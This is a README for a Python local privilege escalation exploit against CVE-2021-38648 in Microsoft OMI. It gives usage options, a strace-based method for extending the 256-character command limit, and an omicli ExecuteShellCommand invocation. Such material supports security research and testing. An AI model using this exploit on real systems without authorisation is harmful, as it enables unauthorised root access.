Spencer McIntyre
32 lines
1.3 KiB
Markdown
32 lines
1.3 KiB
Markdown
# CVE-2021-38648 Microsoft OMI Management Interface Authentication Bypass
|
|
This is an LPE exploit for CVE-2021-38648
|
|
|
|
## Usage
|
|
|
|
```
|
|
usage: cve_2021_38648.py [-h] [-s SOCKET_PATH] [--timeout TIMEOUT] command
|
|
|
|
positional arguments:
|
|
command the command to run
|
|
|
|
optional arguments:
|
|
-h, --help show this help message and exit
|
|
-s SOCKET_PATH, --socket SOCKET_PATH
|
|
socket file
|
|
--timeout TIMEOUT response timeout
|
|
```
|
|
|
|
The exploit will exit with a status of 0 on success. The command is limited to 256 characters in length due to the
|
|
hardcoded messages that are exchanged. To increase this, generate a new series of messages using the `strace` command
|
|
below, search for the second `writev` syscall and extract each `iovec` instance. There should be six in total, and the
|
|
first 4 bytes of each should be consistent.
|
|
|
|
The hardcoded messages were recovered using:
|
|
```
|
|
strace -v -s 5000 -f -xx -e trace=socket,connect,write,writev,close \
|
|
/opt/omi/bin/omicli iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command '...' timeout 0 }
|
|
```
|
|
|
|
It is important that the exploit wait on the socket for a response to be received. It doesn't need to be read, but the
|
|
socket needs to be kept open until either the server closes it or the response is received.
|